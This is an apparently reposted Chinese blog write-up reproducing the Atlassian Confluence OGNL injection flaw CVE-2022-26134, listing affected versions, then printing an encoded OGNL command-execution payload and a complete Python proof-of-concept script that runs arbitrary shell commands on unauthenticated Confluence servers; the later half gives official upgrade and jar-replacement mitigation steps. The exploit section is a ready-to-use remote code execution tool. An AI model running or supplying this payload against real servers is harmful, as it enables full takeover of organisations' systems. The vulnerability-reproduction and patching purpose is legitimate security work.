ATLASSIAN CONFLUENCE 远程代码执行漏洞(CVE-2022-26134)漏洞复现

2023-11-11

一、漏洞概述

近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞(CVE-2022-26134)的安全公告,远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,CVSS评分为10。目前该漏洞细节与PoC已被公开披露,且被检测到存在在野利用。请相关用户尽快采取措施进行防护。

Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。

二、影响范围

受影响版本

  • 1.3.0 <= Confluence Server and Data Center < 7.4.17
  • 7.13.0 <= Confluence Server and Data Center < 7.13.7
  • 7.14.0 <= Confluence Server and Data Center < 7.14.3
  • 7.15.0 <= Confluence Server and Data Center < 7.15.2
  • 7.16.0 <= Confluence Server and Data Center < 7.16.4
  • 7.17.0 <= Confluence Server and Data Center < 7.17.4
  • 7.18.0 <= Confluence Server and Data Center < 7.18.1

不受影响版本

  • Confluence Server and Data Center 7.4.17
  • Confluence Server and Data Center 7.13.7
  • Confluence Server and Data Center 7.14.3
  • Confluence Server and Data Center 7.15.2
  • Confluence Server and Data Center 7.16.4
  • Confluence Server and Data Center 7.17.4
  • Confluence Server and Data Center 7.18.1

三、 漏洞检测

使用payload进行检测

payload = "%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D".format(command)

poc利用脚本如下:

https://github.com/Nwqda/CVE-2022-26134/blob/master/cve-2022-26134.py

 python代码如下:

# -*- coding: utf-8 -*-

# Author:   Naqwada (RuptureFarm 1029) <naqwada@pm.me>
# License:  MIT License (http://www.opensource.org/licenses/mit-license.php)
# Docs:     https://github.com/Naqwa/CVE-2022-26134
# Website:  http://samy.link/
# Linkedin: https://www.linkedin.com/in/samy-younsi/
# Note:     FOR EDUCATIONAL PURPOSE ONLY.

from bs4 import BeautifulSoup
import requests
import urllib3
import re
import sys
urllib3.disable_warnings()

def banner():
  CVE_2022_26134Logo = """
   _______    ________                                
  / ____/ |  / / ____/                                
 / /    | | / / __/                                   
/ /___  | |/ / /___                                   
\____/  |___/_____/___       ___   _____________ __ __
  |__ \ / __ \__ \|__ \     |__ \ / ___<  /__  // // /
  __/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
 / __// /_/ / __// __/_____/ __// /_/ / /___/ /__  __/
/____/\____/____/____/    /____/\____/_//____/  /_/   
                                                      
                  \033[1;91mCVE-2022-26134 - OGNL injection vulnerability\033[1;m                  
Author: \033[1;92mNaqwada\033[1;m                         
RuptureFarm 1029      
                FOR EDUCATIONAL PURPOSE ONLY.   
  """
  return print('\033[1;94m{}\033[1;m'.format(CVE_2022_26134Logo))


def check_target_version(host):
  try:
    response = requests.get("{}/login.action".format(host), verify=False, timeout=8)
    if response.status_code == 200:
      filter_version = re.findall("<span id='footer-build-information'>.*</span>", response.text)
      
      if len(filter_version) >= 1:
        version = filter_version[0].split("'>")[1].split('</')[0]
        return version
      else:
        return False
    else:
      return host
  except:
    return False


def send_payload(host, command):   
    payload = "%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D".format(command)
    response = requests.get("{}/{}/".format(host, payload), verify=False, allow_redirects=False)
    
    try:
      if response.status_code == 302:
          return response.headers["X-Cmd-Response"]
      else:
          return "This target does not seem to be vulnerable."
    except:
      return "This target does not seem to be vulnerable."


def main():
  banner()
  if len(sys.argv) < 3:
    print("\033[1;94mHow to use:\033[1;m")
    print("python3 {} https://target.com cmd".format(sys.argv[0]))
    print("ex: python3 {} https://target.com id".format(sys.argv[0]))
    print("ex: python3 {} https://target.com 'ps aux'".format(sys.argv[0]))
    return
  
  target = sys.argv[1]
  cmd = sys.argv[2]
  version = check_target_version(target)

  if version:
    print("Confluence target version: \033[1;94m{}\033[1;m".format(version))
  else:
    print("Can't find the used version for this target. Is the target offline?")
    return
  
  exec_payload = send_payload(target, cmd) 
  print(exec_payload)

if __name__ == "__main__":
   main()

使用脚本验证存在漏洞的站点,验证成功:

 

四、漏洞防护

4.1 官方升级

官方建议用户升级至最新版本,以保证服务的安全性及稳定性。下载链接:https://www.atlassian.com/software/confluence/download-archives

可参考下表,升级至对应修复版本:

受影响版本 修复版本
1.3.0 – 7.4.16 7.4.17
7.13.0 – 7.13.6 7.13.7
7.14.0 – 7.14.2 7.14.3
7.15.0 – 7.15.1 7.15.2
7.16.0 – 7.16.3 7.16.4
7.17.0 – 7.17.3 7.17.4
7.18.0 7.18.1

4.2 临时防护措施

若相关用户暂时无法进行升级操作,也可通过以下步骤来缓解该问题:

对于 Confluence 7.15.0 – 7.18.0

如果在集群中运行 Confluence,则需要在每个节点上重复此过程。您不需要关闭整个集群。

1、关闭 Confluence。

2、下载 xwork-1.0.3-atlassian-10.jar 到Confluence服务器。链接:

https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar

3、将xwork-1.0.3-atlassian-8.jar删除或移出Confluence 安装目录。文件路径:

 <confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3-atlassian-8.jar

注意:请用户不要在该目录中留下旧JAR文件的副本。

4、将下载的xwork-1.0.3-atlassian-10.jar文件复制到以下目录中。目录路径:

<confluence-install>/confluence/WEB-INF/lib/

5、检查xwork-1.0.3-atlassian-10.jar文件权限是否与同一目录中的其他文件相同。

6、重启 Confluence。

请记住,如果您在集群中运行 Confluence,请确保在所有节点上运行此脚本。

对于Confluence 7.0.0 – Confluence 7.14.2

如果在集群中运行 Confluence,则需要在每个节点上重复此过程。您不需要关闭整个集群。

1、关闭 Confluence。

2、下载 xwork-1.0.3-atlassian-10.jar、webwork-2.1.5-atlassian-4.jar和CachedConfigurationProvider.class 三个文件到 Confluence Windows 服务器。链接分别为:

https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar

https://packages.atlassian.com/maven-internal/opensymphony/webwork/2.1.5-atlassian-4/webwork-2.1.5-atlassian-4.jar

https://confluence.atlassian.com/doc/files/1130377146/1137639562/3/1654274890463/CachedConfigurationProvider.class

3、将xwork-1.0.3.6.jar与webwork-2.1.5-atlassian-3.jar删除或移出Confluence 安装目录。文件路径分别为:

<confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3.6.jar

<confluence-install>/confluence/WEB-INF/lib/webwork-2.1.5-atlassian-3.jar

注意:请用户不要在该目录中留下以上旧JAR文件的副本。

4、将下载的xwork-1.0.3-atlassian-10.jar文件复制到以下目录中。目录路径:

<confluence-install>/confluence/WEB-INF/lib/

5、将下载的webwork-2.1.5-atlassian-4.jar文件复制到以下目录中。目录路径:

<confluence-install>/confluence/WEB-INF/lib/

6、检查下载的新文件权限是否与同一目录中的其他文件相同。

7、切换到以下目录

<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup

(1)在setup目录下创建一个名为webwork的新目录

(2)将CachedConfigurationProvider.class复制到创建好的webwork目录中。目录路径:

<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork

(3)检查CachedConfigurationProvider.class文件权限是否与同一目录中的其他文件相同。

8、重启 Confluence。

请记住,如果您在集群中运行 Confluence,请确保在所有节点上运行此脚本。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

ATLASSIAN CONFLUENCE 远程代码执行漏洞(CVE-2022-26134)漏洞复现 的相关文章

  • 2018 年,关于深度学习的 10 个预测

    我有一种预感 2018年 所有的事情都会发生巨变 我们在2017年看到的深度学习取得的惊人突破将会以一种强大的方式延续到2018年 2017年在深度学习领域的研究成果将会应用于日常的软件应用中 下面是我对2018年深度学习的10个预测 1
  • 抓取chrome所有版本密码

    文章首发先知社区 https xz aliyun com t 9752 工具已上传到github https github com SD XD Catch Browser 谷歌浏览器存储密码的方式 在使用谷歌浏览器时 如果我们输入某个网站的
  • python 无头模式 绕过检测_python爬虫反反爬虫有绝技,轻松绕开百度人机验证!...

    你可能已经了解到了无头浏览器的作用以及使用的方法 那么本篇文章就让我们一起用无头浏览器做点事情 是的你没有看错 我们要 搞 的对象就是百度指数这个网站 不知道你平时是否会应用到这里面的数据呢 今天的主要目标就是使用无头浏览器登录百度指数网站
  • 离散傅里叶变换MATLAB实现

    文章目录 要求 一 连续函数抽样 二 抽样长度确定 三 DFT 1 使用一次循环实现DFT 2 使用矩阵实现DFT 总结 要求 有一单频信号y t sin 2 ft 其中f 100Hz 和f 500Hz 分别用DFT求y t 的谱 抽样频率
  • 某中学校校园网络方案设计(课程设计)

    目录 一 绪论 1 1 中小学校园信息化应用的现状 1 2 中小学校园网络系统现状 二 需求分析 2 1 获取需求的途径 方法 过程等 2 2基本情况 2 3 建筑分布 2 4 信息点 需联网的设备 分布及数量 表格 三 设计 3 1 设计

随机推荐

  • cesium for ue5中actor的cesium georeference组件的改变(英文教程文档是更新了的)

    今天 重新回顾下cesium for ue的教程 actor添加cesium georeference组件 发现在ue5中 没有这个组件了 忍住卸载ue5 重新安装ue4 27的冲动 cesium的组件数量增多了 反而功能减少了 不可能 绝
  • Unity之UI

    Unity之UGUI 一 Canvas 1 创建Canvas 2 Render Mode 1 Screen Space Overlay 2 Screen Space Camera 3 World Space 3 Pixel Perfect
  • 【计算机毕设项目】基于大数据的社交平台数据爬虫舆情分析可视化系统

    文章目录 0 前言 1 课题背景 2 实现效果 实现功能 可视化统计 web模块界面展示 3 LDA模型 4 情感分析方法 预处理 特征提取 特征选择 分类器选择 实验 5 部分核心代码 0 前言 这两年开始毕业设计和毕业答辩的要求和难度不
  • python智能合约编程_如何用Python Flask开发以太坊智能合约

    将数据存储在数据库中是任何软件应用程序不可或缺的一部分 无论如何控制该数据库都有一个该数据的主控 区块链技术将数据存储到区块链网络内的区块中 因此 只要某个节点与网络同步 它们就会获得区块中数据的副本 因此 该技术中没有特定的数据主控 在本
  • C#学习教程八

    枚举 枚举是C 编程语言的一种类型 跟类 结构 密封类 分布类 委托 事件 抽象都是同一级别的类型 枚举用enum关健字来定义 枚举可以一次性定义一组常量和常量的使用方式一样 枚举通常用在分支语句中 这种做法可以增加程序的可读性 枚举中的每
  • 如何查看和修改linux系统的字符集

    查看系统的字符集 通过locale命令查看系统支持的字符集 这个是很干净的一个系统 root master locale a C en US utf8 POSIX 还有这种对字符集支持比较好的 root master yt locale a
  • lock锁

    目录 1 lock 基本用法 2 lock公平锁与非公平锁 3 lock注意事项 4 synchronized 与 lock区别 1 lock 基本用法 lock lock try finally lock unlock 或者 try lo
  • Vue中element组件Pagination跳转到第二页后搜索功能失效

    在写组件分页功能遇到一个bug 当点击到除第一页以外 搜索功能失效 解决方法是在搜索函数中加上this page 1 如果搜索是空值显示数据 searchKeyFun2 value this page 1 设置搜索页面到第一页 this s
  • 18.1. Fabric2.2 区块链农产品溯源系统 - 多Peer部署(扩展)

    这是一篇后补文章 看时间大家能够看出来 通过前面的学习 大家知道如何增加组织 如何部署多Orderer 本节介绍如何在一个组织内部署多个Peer节点 本节是基于上一节操作的继续 脚本也是基于上节进行修改的 1 目标 为组织1新增一个节点 p
  • 微信支付开发——多种支付

    微信提供了好多种的支付产品 本文要讲解的是我在实际开发中用的几种 JSAPI支付 NATIVE支付 扫码支付 H5支付 小程序支付 微信提供的各种支付方式 只要了解一种 其他几种支付差别不大 其中不管是哪种支付 都需要调用统一的一个接口 微
  • STM32的USART发送中断标志位USART_IT_TXE和USART_IT_TC

    与STM32的发送中断相关的标志位有USART IT TXE和USART IT TC 根据ST芯片手册的信息可知 USART在发送移位寄存器 Transmit Shift Register 前面 还有一个TDR Transmit data
  • C#多线程开发总结

    1 关闭Form窗体进程还在的问题方法一 Thread IsBackground true 方法二 System Environment Exit 0 方法三 FormClosing方法内手动释放所有托管资源 注意 强行关闭时都要做好全局未
  • IDEA 如何设置和修改项目属性?

    找到project structure按钮 1 点击界面上的project structure按钮或者使用快捷键ctrl alt shift s打开工程设置页 END 设置project默认的jdk和java语言级别
  • PHP 合成图片并在图片上加文字

    Info PHP把一张图片作为背景和另一张图片合成新图片 public function createImage path 1 XXXXX attachment images 20200801 4d8e641215b9ed593298ff6
  • 域名系统几类服务器,域名服务器可分为什么类型

    域名服务器是进行域名 domain name 和与之相对应的IP地址 IP address 转换的服务器 DNS中保存了一张域名 domain name 和与之相对应的IP地址 IP address 的表 以解析消息的域名 把域名翻译成IP
  • 使用axios.post()传递多个参数时出现中文乱码问题

    方式一 var vm new Vue el app data id name age methods getStudentInf axios post servelt02 do 处理路径 id a0022 name 李思思 传递的参数 这是
  • 基于蚁群算法的障碍物路径搜索算法的MATLAB仿真

    基于蚁群算法的障碍物路径搜索算法的MATLAB仿真 障碍物路径搜索是一个重要的问题 在许多实际应用中都有广泛的应用 例如无人机路径规划 机器人导航等 蚁群算法是一种基于蚂蚁觅食行为的启发式优化算法 被广泛应用于解决路径搜索问题 本文将介绍如
  • 部署记录laravrl

    500错误 检查环境变量 putenv函数解禁 pathinfo扩展 yarn prod 生成前端资源 iseed table name 数据表生成seeder文件 composer install 出错时 错误信息有详细介绍 缺少path
  • DNS协议及其工作原理

    DNS是域名系统 Domain Name System 的缩写 它是一种用于将域名转换为IP地址的分布式数据库系统 它是因特网的基石 能够使人们通过域名方便地访问互联网 而无需记住复杂的IP地址 DNS的历史可以追溯到1983年 当时因特网
  • ATLASSIAN CONFLUENCE 远程代码执行漏洞(CVE-2022-26134)漏洞复现

    一 漏洞概述 近日 Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞 CVE 2022 26134 的安全公告 远程攻击者在未经身份验证的情况下 可构造OGNL表达式进行注入 实现在